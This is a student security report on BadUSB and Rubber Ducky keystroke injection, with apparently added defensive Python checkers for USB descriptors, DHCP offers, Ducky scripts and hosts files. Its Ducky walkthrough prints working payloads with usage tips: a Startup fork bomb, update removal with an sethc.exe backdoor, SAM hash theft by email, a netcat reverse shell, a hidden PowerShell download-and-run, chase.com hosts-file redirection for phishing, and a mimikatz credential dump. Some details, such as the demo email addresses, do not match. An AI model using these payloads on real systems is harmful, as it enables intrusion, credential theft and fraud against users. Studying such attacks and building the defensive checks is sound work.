Shawn Seaman Professor Hayajneh Network Security and Perimeter Protection
Bad USB: Abusing the Inherent Trust of IO Devices

USB has become such a standard interface in the IT world because of its sheer versatility. There is a multitude of devices that connect through the USB interface, making it a number one interface for many types of technology. If so many different hardware implementations can connect through the USB standard, what types of security mechanisms are offered, and what is the process of discerning the type of hardware? Unfortunately, the bulk of USB devices on the market are in a sense HIDs (Human Interface Devices), or more simply put, devices that rely on direct physical interaction with human beings. In a literal sense, it would seem that there would not be many, if any, practical security methods applied to USB. Why would a workstation not trust a USB device, when it is trusted by the human? Humans trust keyboards, so therefore, computers trust keyboards. Webc ams or keyboard devices being engineered at the firmware level, to become Trojan horses that secretly deliver payloads, was never fathomed by the IT security world, and for good reason. The physical components that make up a USB device, and the fact that companies do not lock down the firmware on the devices they produce, have led to the ability of security researchers to exploit USB. With the use of custom code injection, firmware reverse engineering, and the inherent trust that OSes across all platforms (Linux, Mac, and Windows) place in USB devices, researchers have truly been able to turn good devices evil.

What exactly is USB and BadUSB? USB stands for Universal Serial Bus; it is a standard developed in the early 1990s that created the communication protocols in a bus connection, communication and power supply between a computer (or motherboard) and the other device.[1] The USB protocol simultaneously powers the device as well as creating mediums for data transfer, data streams, and communication. BadUSB is a new class of attack that relies on the USB interface itself. This exploit is technically separate from operating system security, though it does revel in the fact that machines trust USB by default. In a sense BadUSB takes advantage of the lack of embedded security in USB devices. The USB device, whether it is a keyboard, webcam, mouse, or even a joystick, becomes malicious through device tampering, not OS tampering.[2] This makes BadUSB so dangerous. It dually wields the ability to be hidden in a joystick or webcam (are workstations going to scan joysticks?), and has the versatility of being OS independent. Many virus programmers only target specific OSes due to the different libraries or dependencies they contain. (Trojans coded in Java do infect all OSes.) BadUSB does not face the problem of dependencies, as for the most part all OSes will accept, for example, keyboards. It is very important to know what BadUSB is not before truly understanding what it indeed is. Viruses, Trojans, worms, or other malware require OS-dependent libraries, DLLs, and other dependencies, not to mention antivirus and firewall evasion, but BadUSB is the opposite of this type of attack vector. BadUSB is not a piece of malware sitting on the flash storage portion of the USB device. Turning a USB device "evil" relies on actually reprogramming the USB device itself at the firmware level. Deep-level code injection into the firmware, through reverse engineering, can turn a simple USB microphone into a device capable of injecting keystrokes silently.

What damage can keystroke injection do? The possibilities are indeed endless, and they will be demonstrated in this report by even a novice user. Silently executing commands via Windows PowerShell can cause havoc on a workstation. So it is understood that BadUSB can emulate a keyboard. Antivirus will not be able to scan this as malicious; it simply reads as a keyboard. The device can now execute PowerShell commands on the OS to delete files, infiltrate files, or install malware. The hosts file of a workstation can be edited, which will redirect users to specific websites of the attacker's choice. With the right social engineering attack implementation, this can cause credentials to be sniffed through the use of cloned websites.

A second attack vector of BadUSB is that of spoofed network adapters. This can be a huge problem if the attacker embedded code, in this example, to change the computer's DNS settings to redirect traffic. Security mechanisms will overlook this attack, and Man-in-the-Middle attacks will become easy. It would be simple to implement a rogue access point, having unknowing users connect to it, and then subjecting them to Man-in-the-Middle attacks. They would be none the wiser, considering there is no protection against detecting a USB mouse transforming into a spoofed network adapter. Another exploit BadUSB can take advantage of is the fact that many devices are plugged in and recognized [...]
previously. All USB devices have a controller chip. The user doesn't interact with the controller chip. An example of this would be a user interacting with a flash drive for file storage: they are only interacting with the mass storage portion of the device. The same flash drive stores firmware which is executed by the controller chip. Again the user does not interact with the firmware, only with the fact that the USB device is deemed "a mass storage device." Unfortunately, this goes for the OS as well. So if the workstation only sees what the USB device wants it to see, but not the underworkings at the firmware level, it can be assumed that there are some security flaws that could be spawned from this design. It should be understood then the mechanics behind how USB devices identify themselves to workstations. The host controller inside the workstation will recognize [...] For example, an external hard drive that gets assigned the same drive letter every time it is plugged in, which works out famously when automatic OS backup software has that path already stored. Take a look at this graphical representation of USB identification standards, and exploiting them will become more clairvoyant. We are assuming here that the attacker has already reverse engineered the firmware and has begun to inject code into the empty spaces in said firmware.

An attacker can modify the interface to show: 1 (webcam), 14 (video). This is telling the host controller of a workstation that a flash storage device has audio and video capability, and to be treated as such by loading said drivers. Endpoints are data ports responsible for streams of information through the bus. Think of endpoints like TCP streams. The endpoints portion of the USB descriptors will always have a control portion identified as 0. Here the attacker modified the endpoints to no longer be the data transfer protocol that was suitable for the flash storage device, but instead has told the workstation to accommodate video transfer streams and audio transfer streams. This storage device is being completely read as a webcam at this point. This has the makings of an evil firmware that accesses the audio and video captures of a workstation and uses them for insidious reconnaissance. Upon looking at the serial number modification, a few important things can be noted. The serial numbers are not even the same length. USB does not have a fixed serial number or any type of constant method behind USB serial numbers. They are completely randomized [...] Firstly the device is plugged into the USB port. At this point the device boots up as it is powered on, and the boot loader initializes [...]
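The interface and endpoint descriptors described above are what the host actually sees, so they are also what a defender can check. The following is an added example for this report, not code from the report or from SRLabs: it walks a USB configuration descriptor chain (layout per USB 2.0 chapter 9), lists each interface's class and its endpoints, and compares the announced classes with what the device was bought as. The two descriptor byte strings are constructed for the example, not captured from real hardware. Identity fields (VID, PID, serial) are deliberately ignored, since the report notes they can be spoofed; a device that wants to type still has to announce a keyboard interface.

```python
"""Walk a USB configuration descriptor and compare what the device announces
against what it was bought as.  Added example for this report, not from the
report or from SRLabs; descriptor layout follows USB 2.0 spec chapter 9.
The sample descriptor bytes below are constructed, not captured from a device.
"""
import struct

DT_INTERFACE = 0x04
DT_ENDPOINT = 0x05
CLASS_NAMES = {0x01: "audio", 0x03: "hid", 0x08: "mass-storage", 0x0E: "video"}
TRANSFER_TYPES = ("control", "isochronous", "bulk", "interrupt")


def parse_configuration(blob):
    """Return the interfaces in a configuration descriptor chain, each with
    its class triple and the endpoint descriptors that follow it."""
    interfaces = []
    pos = 0
    while pos + 2 <= len(blob):
        length, dtype = blob[pos], blob[pos + 1]
        if length < 2 or pos + length > len(blob):
            raise ValueError("malformed descriptor at offset %d" % pos)
        desc = blob[pos:pos + length]
        if dtype == DT_INTERFACE and length >= 9:
            # bInterfaceNumber, bAlternateSetting, bNumEndpoints,
            # bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol
            number, _alt, _num_ep, cls, sub, proto = struct.unpack_from("<6B", desc, 2)
            interfaces.append({"number": number, "class": cls, "subclass": sub,
                               "protocol": proto, "endpoints": []})
        elif dtype == DT_ENDPOINT and length >= 7 and interfaces:
            # bEndpointAddress, bmAttributes, wMaxPacketSize, bInterval
            addr, attrs, max_packet, _interval = struct.unpack_from("<BBHB", desc, 2)
            interfaces[-1]["endpoints"].append({
                "number": addr & 0x0F,
                "direction": "in" if addr & 0x80 else "out",
                "transfer": TRANSFER_TYPES[attrs & 0x03],
                "max_packet": max_packet,
            })
        # configuration, HID and class-specific descriptors are skipped over
        pos += length
    return interfaces


def class_names(interfaces):
    return sorted({CLASS_NAMES.get(i["class"], "class-0x%02x" % i["class"])
                   for i in interfaces})


def policy_verdict(interfaces, expected_classes):
    """Allow the device only if it announces nothing beyond the classes it is
    supposed to have.  VID/PID/serial are not consulted: they can be spoofed,
    whereas a device that wants to type must expose a keyboard interface."""
    found = set(class_names(interfaces))
    unexpected = sorted(found - set(expected_classes))
    keyboard = any(i["class"] == 0x03 and i["protocol"] == 0x01 for i in interfaces)
    return {"allowed": not unexpected, "unexpected": unexpected, "keyboard": keyboard}


# Constructed: a plain flash drive, and the same drive whose configuration also
# carries a boot-protocol keyboard interface (class 3, subclass 1, protocol 1).
FLASH_DRIVE_ONLY = bytes.fromhex(
    "09 02 20 00 01 01 00 80 32"      # configuration, wTotalLength 32, 1 interface
    "09 04 00 00 02 08 06 50 00"      # interface 0: mass storage, SCSI, bulk-only
    "07 05 81 02 00 02 00"            # endpoint 1 IN, bulk, 512 bytes
    "07 05 02 02 00 02 00"            # endpoint 2 OUT, bulk, 512 bytes
)
FLASH_DRIVE_PLUS_KEYBOARD = bytes.fromhex(
    "09 02 30 00 02 01 00 80 32"      # configuration, wTotalLength 48, 2 interfaces
    "09 04 00 00 02 08 06 50 00"
    "07 05 81 02 00 02 00"
    "07 05 02 02 00 02 00"
    "09 04 01 00 01 03 01 01 00"      # interface 1: HID, boot subclass, keyboard protocol
    "07 05 83 03 08 00 0a"            # endpoint 3 IN, interrupt, 8 bytes, every 10 ms
)

if __name__ == "__main__":
    for label, blob in (("flash drive", FLASH_DRIVE_ONLY),
                        ("flash drive + keyboard", FLASH_DRIVE_PLUS_KEYBOARD)):
        ifs = parse_configuration(blob)
        print(label, class_names(ifs), policy_verdict(ifs, ["mass-storage"]))
```

Run against the second descriptor the verdict is "not allowed, unexpected: hid, keyboard: True", which is exactly the composite-device shape a reprogrammed flash drive presents; tools such as USBGuard apply the same idea as a live policy on Linux.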
[...] This gave them complete access to the USB firmware to make USB devices perform and appear as any type of USB device. The first step was to find leaked firmware on the net. In order to reverse engineer the USB chips from the specific two companies they targeted, they needed the necessary code. They then applied heuristics to the code. They counted matches with start and call instructions for different memory locations. This allowed them to find the descriptors in the binary code. Once they essentially had the firmware mapped out, they installed their own hooks and injected their own code in unused parts of the firmware. (This could be performed on webcams, keyboards, etc., but they focused on a flash storage device.) This type of reverse engineering they applied to only two chips. But nothing is stopping malicious users with resources from reverse engineering many chips from many companies.

Nohl and Lell ran multiple demo attacks. They ran the attacks on a Linux system. The first attack revolved around gaining admin credentials and escalating privileges. Linux requires malware to run with root privileges to infect other USB devices or become a network adapter that changes DNS settings. They needed to escalate privileges to get root access. How was this done? They got the sudo password on the machine. The USB device executed kb commands to activate and restart the screensaver. The user at this point re-entered the password to get off the screensaver, and then the malware stole the sudo (admin) password by malware injected in a binary related to the screensaver libraries. Now further damage could be done to the system, as Nohl and Lell now had complete root access. This all relied on keyboard injection and code injected into screensaver dependencies, and none of the malicious activity took place on the storage portion that interacts with the OS. This completely evades antivirus.

The second attack had the USB stick spoofed as a network adapter. They successfully got the USB storage device to act as a DHCP server and assign an IP, but not assign a default gateway. This tells the workstation to use the DNS server but doesn't tell it how to reach it. This is a form of DNS poisoning. A real world implementation of this attack would be when a victim browses to https://chase.com, but goes to the attacker's version of a cloned chase.com and enters their credentials through the spoofed site. Virus scanners won't pick up on this. They also proposed a theoretical virtual machine breakout attack: a USB device programmed to spawn into two USB devices, where the second device connects to the host computer, then begins injection to pillage the system. This could be trouble for backed-up cloud servers on virtual machines. Nohl and Lell also performed attacks using an Android phone. They simply plugged the phone into a workstation to charge the phone. Not only did the phone charge, but they performed the DNS attack as well.

It has been discussed in great detail what BadUSB can do, but what security mechanisms can be taken to avert the exploit? Are software rollbacks a viable solution? Consider this scenario. The system admin decides to reinstall operating systems, or do rollbacks/system restores to clean up the attack. They need to recover from the virus, and will most likely lose time and money during the effort. The problem is that this is not patchable via software. If the keyboard has infected firmware, the system admin would have to realize [...]
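The DHCP trick in Nohl and Lell's second demo has a recognisable shape on the wire: an OFFER that carries a DNS server option but no router option. The following is an added example for this report, not code from the report or from SRLabs: it parses a DHCP message (fixed header per RFC 2131, options per RFC 2132), and assess_offer reports that pattern. The two sample packets are constructed by build_sample_offer for the test, not captured from a network; the addresses and the client MAC in them are made up.

```python
"""Inspect a DHCP OFFER for the pattern in Nohl and Lell's second demo: the
rogue adapter hands out a DNS server but no default gateway, so the host keeps
its real uplink and only its name resolution moves.  Added example, not from
the report or SRLabs; message layout follows RFC 2131/2132, and the sample
packets are constructed here, not captured."""
import struct
from ipaddress import IPv4Address

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_SUBNET_MASK, OPT_ROUTER, OPT_DNS = 1, 3, 6
OPT_LEASE, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 51, 53, 54, 255
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}


def parse_dhcp(packet):
    """Split a DHCP message into its fixed header fields and an options dict."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message (missing magic cookie)")
    op, _htype, _hlen, _hops, xid = struct.unpack_from("!BBBBI", packet, 0)
    yiaddr = str(IPv4Address(packet[16:20]))    # address offered to the client
    options, pos = {}, 240
    while pos < len(packet):
        code = packet[pos]
        if code == OPT_END:
            break
        if code == 0:                            # pad byte, no length field
            pos += 1
            continue
        length = packet[pos + 1]
        options[code] = packet[pos + 2:pos + 2 + length]
        pos += 2 + length
    return {"op": op, "xid": xid, "yiaddr": yiaddr, "options": options}


def _addresses(raw):
    return [str(IPv4Address(raw[i:i + 4])) for i in range(0, len(raw) - len(raw) % 4, 4)]


def assess_offer(packet):
    """Summarise a server reply and list anything a defender should look at."""
    msg = parse_dhcp(packet)
    opts = msg["options"]
    kind = MSG_TYPES.get(opts.get(OPT_MSG_TYPE, b"\x00")[0], "unknown")
    routers = _addresses(opts.get(OPT_ROUTER, b""))
    dns = _addresses(opts.get(OPT_DNS, b""))
    findings = []
    if dns and not routers:
        findings.append("offers DNS server(s) but no default gateway")
    if kind not in ("OFFER", "ACK"):
        findings.append("message type %s is not a server reply" % kind)
    return {"message_type": kind, "assigned": msg["yiaddr"], "routers": routers,
            "dns_servers": dns, "findings": findings}


def build_sample_offer(yiaddr, server, dns=None, router=None, xid=0x3903F326):
    """Constructed DHCP OFFER used as test input (not a captured packet)."""
    header = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0)  # op, htype, hlen, hops, xid, secs, flags
    header += bytes(4)                                        # ciaddr
    header += IPv4Address(yiaddr).packed + IPv4Address(server).packed + bytes(4)  # yiaddr, siaddr, giaddr
    header += bytes.fromhex("001122334455") + bytes(10)       # chaddr: made-up MAC, padded to 16
    header += bytes(64) + bytes(128)                          # sname, file
    opts = bytes([OPT_MSG_TYPE, 1, 2])
    opts += bytes([OPT_SERVER_ID, 4]) + IPv4Address(server).packed
    opts += bytes([OPT_LEASE, 4]) + struct.pack("!I", 3600)
    opts += bytes([OPT_SUBNET_MASK, 4]) + IPv4Address("255.255.255.0").packed
    if router:
        opts += bytes([OPT_ROUTER, 4]) + IPv4Address(router).packed
    if dns:
        opts += bytes([OPT_DNS, 4]) + IPv4Address(dns).packed
    return header + MAGIC_COOKIE + opts + bytes([OPT_END])


if __name__ == "__main__":
    print(assess_offer(build_sample_offer("10.0.0.5", "10.0.0.1", dns="10.0.0.1")))
    print(assess_offer(build_sample_offer("192.168.1.20", "192.168.1.1",
                                          dns="192.168.1.1", router="192.168.1.1")))
```

A single "DNS without gateway" offer is not proof on its own (some deliberately split networks look like this), so in practice the check is combined with where the offer came from: a DHCP server that appeared on a newly enumerated USB network adapter is the combination the demo relies on.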
[...] serial number. Perhaps a firewall solution does have this feature. It would not matter. Serial numbers are not mandatory, as mentioned before, and can be spoofed. If the user allows a keyboard from Logitech, for example, with a certain serial number, and the firewall whitelists it, the BadUSB exploit can detect this and spoof this serial. Antivirus meets a similar fate of ineffectiveness as its predecessors. It is especially ineffective if the USB device is plugged in at boot time and a rootkit is installed via the boot sector, as already discussed. What if the device is plugged in during login and is scanned immediately? The scanner wants to read the contents of the device, but this is done with the permission and assistance of the firmware. If the firmware is programmed to lock itself down from being read, the scanner is useless. Possible fixes only exist in the realm of the hardware manufacturers at this time. Manufacturers need to implement a locked firmware. The problem with this is that there is then no feasible way to have firmware updates. It is absolutely impractical to lock down the firmware. It is possible to use cryptographic signatures for firmware, but this is hard and expensive to implement on USB microcontroller chips. It is so costly that this implementation would most certainly never become mainstream and evolve into a USB standard of security. Examination of the IronKey USB storage device, and its hefty price tag of over 100 dollars for 16 GB of data storage, provides the assurance of cryptographic signing not becoming a standard.[3] IronKey offers military grade encrypted USB products, as well as physical protection. They assure that their USB storage devices are not susceptible to BadUSB attacks. This is one example of a company using code signing encryption methods to authenticate firmware updates. If the firmware cannot be authenticated it cannot be used. It basically self-destructs. This is expensive, timely and hard to do with a USB controller chip, and therefore in all likelihood won't spread to the masses as a USB standard.

It is obvious and common sense that to have any effect and compromise security, the attacker needs at one point or another, whether by his own hands or the victim's, physical access to a machine. What methods can be used to infect users with BadUSB? The art of social engineering sticks out as the most effective way to utilize [...]
[...] that he would actually sprinkle malicious USB drives in company parking lots, just assuming employees would pick them up and use them. Everyone likes a free storage device. It can be important to take advantage of physical security if networking security is up to par. If an attacker cannot get through the network, it is possible, if they had the will, to infiltrate companies physically, and drop USB devices on sysadmin desks, or perform the attacks themselves at an unmanned workstation. If imagination permits, an adversary with huge amounts of resources packages BadUSB-infected keyboards with workstations meant to be shipped to a government location. They gain access to the workstations before shipment, and swap out the keyboards for the same model, just with a modified firmware. Anything is possible when it comes to BadUSB attacks, and that is mostly due to how relied upon they are as HIDs.

The USB Rubber Ducky exemplifies how any USB device can become an HID.[4] The Rubber Ducky, by the company Hak5, has the motto, "IF IT QUACKS LIKE A KEYBOARD, AND TYPES LIKE A KEYBOARD, IT MUST BE A KEYBOARD". The Rubber Ducky is a 40 dollar USB device that is used by penetration testers or malicious attackers. It acts as a keyboard; more specifically, it's a keyboard injection tool with its own scripting language that the attacker can customize [...]
[...] vital to go over the Ducky syntax and commands. The command REM is analogous to a comment command. Any code that begins on a line with REM will not be executed. It should be known that each command happens on a separate line in a synchronized [...] For example, "DELAY 5000, GUI r" would delay for 5 seconds before opening the Run box. GUI d will switch to the desktop. The SHIFT command is also useful, as it is used to navigate through text selection boxes. It can also be combined with PgUp, PgDn, and many other keys for useful functions. Example: "SHIFT INSERT" is the copy/paste function on most operating systems. The ALT and CONTROL key commands are also used in combination with keyboard characters to execute many commands. ALT f will pull up a file menu, and ALT s will save the file. The arrow commands "ARROW UP, ARROW DOWN, ARROW LEFT, ARROW RIGHT" are self-explanatory directional navigation commands.

This will be a walkthrough of the most simple program. This is to understand the process before the programs get more complex. The duckencode.jar is navigated to via the command prompt. Execute: java -jar duckencode.jar -i easypayload.txt -o inject.bin. This takes the Duckyscript in the text file and outputs it to an injectable bin file. After copying the payload to the SD card and loading it into the Ducky, the script was executed.

    DELAY 3000
    GUI r
    DELAY 1000
    STRING winword.exe
    ENTER
    DELAY 2000
    ENTER
    STRING MY NAME IS SHAWN SEAMAN, THIS IS THE MOST BASIC IMPLEMENTATION OF THE INJECTABLE USB DEVICE'S CAPABILITY
    ENTER
    STRING TO INJECT KEYSTROKES ON A MACHINE. HELLO WORLD!
    DELAY 3000
    GUI r
    DELAY 200
    STRING notepad
    ENTER
    DELAY 200
    STRING Hello World!!!
    ENTER
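Because a Ducky payload is just a list of keystrokes, it can be read back into those keystrokes and triaged before anyone plugs the device in. The following is an added example for this report, not Hak5's encoder or decoder: parse_ducky turns a script using the commands walked through above (REM, DELAY, STRING, ENTER, GUI, CTRL/ALT/SHIFT combinations, ARROW keys) into a list of events, and summarize reports total delay, whether the Run dialog is opened, and which kinds of command the typed text would invoke. SAMPLE_PAYLOAD is constructed for the example from the report's first script and its PowerShell download line, with the download host replaced by the placeholder payload.example.

```python
"""Static triage of a Ducky Script payload: turn it into the key events a host
would receive and flag what the typed text would do.  Added example for this
report, not Hak5's encoder or decoder.  SAMPLE_PAYLOAD is constructed from the
report's first payload plus its PowerShell download line, with the host name
replaced by the placeholder payload.example."""
import re

PLAIN_KEYS = {"ENTER", "TAB", "ESCAPE", "ESC", "SPACE", "DELETE", "INSERT", "HOME",
              "END", "PAGEUP", "PAGEDOWN", "PGUP", "PGDN", "UP", "DOWN", "LEFT",
              "RIGHT", "CAPSLOCK", "BREAK", "PRINTSCREEN", "MENU"}
MODIFIERS = {"GUI": ["gui"], "WINDOWS": ["gui"], "CTRL": ["ctrl"], "CONTROL": ["ctrl"],
             "ALT": ["alt"], "SHIFT": ["shift"], "CTRL-SHIFT": ["ctrl", "shift"],
             "CTRL-ALT": ["ctrl", "alt"], "ALT-SHIFT": ["alt", "shift"]}
# What the typed text would invoke, matched against the lower-cased STRING lines
INDICATORS = [
    ("powershell", r"\bpowershell\b"),
    ("hidden-window", r"-windowstyle\s+hidden"),
    ("download", r"downloadfile|\bwget\b|invoke-webrequest|\bcurl\b"),
    ("command-shell", r"\bcmd(\.exe)?\b|\bnc(\.exe)?\b"),
    ("registry-write", r"\breg\s+add\b"),
    ("hosts-file", r"drivers\\etc|\bhosts\b"),
    ("patch-removal", r"\bwusa\b"),
    ("expression-eval", r"invoke-expression|\biex\b"),
]


def parse_ducky(script):
    """Return a list of ("delay", ms), ("type", text) and ("key", [keys]) events."""
    events = []
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        cmd, arg = cmd.upper(), arg.strip()
        if cmd == "DELAY":
            events.append(("delay", int(arg)))
        elif cmd in ("STRING", "STRINGLN"):
            events.append(("type", arg))
            if cmd == "STRINGLN":
                events.append(("key", ["ENTER"]))
        elif cmd == "ARROW":                      # the report writes "ARROW UP" etc.
            events.append(("key", [arg.upper()]))
        elif cmd in MODIFIERS:
            events.append(("key", MODIFIERS[cmd] + ([arg] if arg else [])))
        elif cmd in PLAIN_KEYS:
            events.append(("key", [cmd]))
        else:
            raise ValueError("line %d: unknown command %r" % (lineno, cmd))
    return events


def summarize(events):
    typed = "\n".join(text for kind, text in events if kind == "type")
    lowered = typed.lower()
    return {
        "typed_chars": len(typed) - typed.count("\n"),
        "total_delay_ms": sum(ms for kind, ms in events if kind == "delay"),
        "opens_run_dialog": any(kind == "key" and keys == ["gui", "r"] for kind, keys in events),
        "indicators": [name for name, pattern in INDICATORS if re.search(pattern, lowered)],
    }


SAMPLE_PAYLOAD = """REM constructed for this example; see the lead-in
DELAY 3000
GUI r
DELAY 1000
STRING winword.exe
ENTER
DELAY 2000
STRING HELLO WORLD!
ENTER
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile("http://payload.example/bob.old","%TEMP%\\bob.exe"); Start-Process %TEMP%\\bob.exe
ENTER
"""

if __name__ == "__main__":
    evs = parse_ducky(SAMPLE_PAYLOAD)
    for ev in evs:
        print(ev)
    print(summarize(evs))
```

The same summary can be produced from a decoded inject.bin (the ducky-decode project in the sources does the bin-to-script step), and the typed_chars figure next to total_delay_ms is the giveaway that a human did not type this: a STRING line is delivered with no inter-key delay at all.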
This simple script opened up Microsoft Word on the workstation and executed the string specified. The second script was a fork bomb batch script[5] that initializes [...] Fork bombs are denial of service attacks that continually call on themselves in the code, in order to constantly replicate until there are no resources left on the PC. Only relevant code will be shown from now on. Full code will be uploaded separately.

    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    ENTER
    STRING copy con a.bat
    ENTER
    STRING @echo off
    ENTER
    STRING :START

This next script will delete Windows Updates. This script was especially useful for making a patched Windows machine vulnerable to exploits.[6]

    [...]
    ENTER
    STRING $input = "KB274517"
    ENTER
    STRING $input = $input.Replace("KB", "")
    ENTER
    STRING $cmdString = "wusa /quiet /norestart /uninstall /kb:" + $input
    ENTER
    STRING Invoke-Expression -Command $cmdString
    ENTER
    STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe
    ENTER

The line STRING $input = "KB274517" is especially important, as that line is where you insert the update you want removed. Multiple payloads can be put onto the SD card, which means multiple updates can be uninstalled. After this script was run on the target computer, Armitage was used to scan for, and execute a payload on, the target host. A reverse shell was initiated and the machine was exploited.

The next attack is called "DuckSlurp", and it acts as a keyboard injector as well as a simultaneous storage device. The point of this attack is to quickly and silently copy the entire contents of "My Documents" to the Ducky.[7] It utilizes [...]

    [...]From = "shawnportscan@gmail.com"
    ENTER
    STRING $ReportEmail.To.Add("shawnportscan@gmail.com")
    ENTER
    STRING $ReportEmail.Subject = "Duck Toolkit Recon Report"
    ENTER
    STRING $ReportEmail.Body = "Please find attached your reconnaissance report."
    ENTER
    STRING $ReportEmail.Attachments [...]

In this script portscanbyshawn@gmail.com and password1234 were used for demo purposes, but these can be customized [...] FTP upload as well as obviously storing to the device.

Another attack looked at during the examination of the Ducky was the SAM extract attack. The SAM file stores the Windows login hashes. It was opted that the SAM file be extracted and then emailed via Gmail.[8] Here is a snippet of code:

    STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
    ENTER
    STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
    ENTER
    STRING $addSlash = $shadow.DeviceObject + "\"
    ENTER
    STRING cmd /c mklink C:\shadowcopy $addSlash
    ENTER
    STRING Copy-Item "C:\shadowcopy\Windows\System32\config\SAM [...]

Another attack that is highly effective is the reverse shell using Netcat. Netcat, or Ncat, is a tool developed by the same company that brought the port scanner Nmap into the works. Netcat can read and write data across a network between two hosts. For lack of a better term, it "cat"s data streams.[9] If a firewall is not properly configured, as in it blocks incoming traffic but doesn't monitor what is going out, a Netcat reverse shell will come in handy. This attack allows Netcat to be downloaded and executed on the victim machine. Upon execution, a session is opened on the victim, where they begin to listen on a specified port. Since we as the attackers already know the port it will be listening on, we will be engaged in a two-way connection with the victim.

    STRING nc.exe <LISTENER IP> <LISTENER PORT> -e cmd.exe -d

This snippet of code from the Ducky script is an important one.[10] Replace the listener IP and listener port with the IP of the victim on the internal network and the port you wish to connect to. This was tested on Windows 7 as the attacker machine and Windows [...] as the victim on a virtual machine, and it was successful. The Ducky is very efficient at using PowerShell, and PowerShell can be a very powerful tool. This simple script will go to a webserver, download a payload, and execute it, while adding persistence for a nice final touch.[11]
    GUI r
    DELAY 100
    STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile("http://shawnspayload/bob.old","%TEMP%\bob.exe"); Start-Process %TEMP%\bob.exe
    ENTER

The simple added string "-windowstyle hidden" will keep the PowerShell window invisible during this entire execution. PowerShell will use the wget command to pull the content from "shawnspayload", and the target will be exploited. The attacker can also edit the hosts file for good measure if they wish. In this example, we can set www.chase.com to redirect to a malicious version that will pull the credentials.

    CTRL-SHIFT ENTER
    DELAY 400
    STRING cd C:\Windows\System32\drivers\etc\
    ENTER
    DELAY 400
    STRING echo 64.149.122.94 www.chase.com>>hosts

Chase will be the site the victim will attempt to go to, whereas the IP is the site the victim will be redirected to. This next Rubber Ducky attack utilizes [...]
    STRING sekurlsa::logonPasswords full
    ENTER

[13] The Ducky, as shown already, can edit the hosts file, but what if the attacker did a more advanced DNS poisoning, and also used a penetration testing tool to further the blow? The below snippet of code is the meat and potatoes of this DNS poisoning attack.[14]

    STRING $redirectionAddress = "10.255.169.6"
    ENTER
    STRING $redirectedSite = "www.chase.com/login"
    ENTER
    STRING $hosts = $redirectionAddress + " " + $redirectedSite
    ENTER
    STRING $hosts2 = $redirectionAddress + " www." + $redirectedSite
    ENTER
    STRING Add-Content -Value $hosts -Path "C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS"
    ENTER
    STRING Add-Content -Value $hosts2 -Path "C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS"

The attacker should modify $redirectedSite to the site the victim assumes they are visiting. Then the attacker should modify $redirectionAddress to the IP they are running the cloned version of the website on. Common examples would be social media sites such as Twitter and Facebook, or financial institutions such as Chase or TD Bank. The attacker can now send a spoofed email to the victim, telling them they need to re-enter their credentials at chase.com. Suspicion will be avoided as the attacker can type the actual Chase URL into the email. Using the Kali Linux tool SET, the attacker will be broadcasting this cloned Chase site on the network.
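Both hosts-file payloads above (the echo ... >>hosts line and the Add-Content lines) leave the same trace: a non-loopback address mapped to a public domain name in a file that normally holds only localhost entries. The following is an added example for this report, not code from the report or from Hak5: it parses a hosts file and reports every entry that overrides DNS for a name, rating entries for watched domains as high and flagging lines that are not valid host names at all. SAMPLE_HOSTS is constructed for the example, with lines shaped like the report's payloads; watch_domains is a parameter of this example.

```python
"""Audit a hosts file for the kind of entries the report's payloads add
(echo ... >> hosts and Add-Content).  Added example, not from the report or
Hak5; the sample file below is constructed, with lines shaped like the
report's two hosts-file payloads."""
import ipaddress
import re

LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost", "ip6-localhost",
               "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}
# RFC 1123 host name: labels of letters, digits and hyphens joined by dots; no path, no port
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                         r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def parse_hosts(text):
    """Return (line number, address, [names]) for every non-comment line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()     # drop trailing comments
        if not line:
            continue
        fields = line.split()
        entries.append((lineno, fields[0], fields[1:]))
    return entries


def audit_hosts(text, watch_domains=()):
    """Return (line, severity, message) findings.  Loopback/unspecified targets
    are treated as deliberate blackholing; anything else overrides DNS."""
    findings = []
    for lineno, address, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            findings.append((lineno, "malformed", "address %r is not an IP" % address))
            continue
        for name in names:
            if not HOSTNAME_RE.match(name):
                findings.append((lineno, "malformed",
                                 "%r is not a host name (path or bad characters)" % name))
                continue
            lname = name.lower()
            if lname in LOCAL_NAMES or ip.is_loopback or ip.is_unspecified:
                continue
            watched = any(lname == d or lname.endswith("." + d) for d in watch_domains)
            findings.append((lineno, "high" if watched else "medium",
                             "%s -> %s overrides DNS for that name" % (name, ip)))
    return findings


SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1 localhost
::1 localhost
64.149.122.94 www.chase.com
10.255.169.6 www.chase.com/login
10.255.169.6 www.www.chase.com/login
0.0.0.0 ads.example
10.1.2.3 intranet.example   # an entry an admin might have added on purpose
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS, watch_domains=("chase.com",)):
        print(finding)
```

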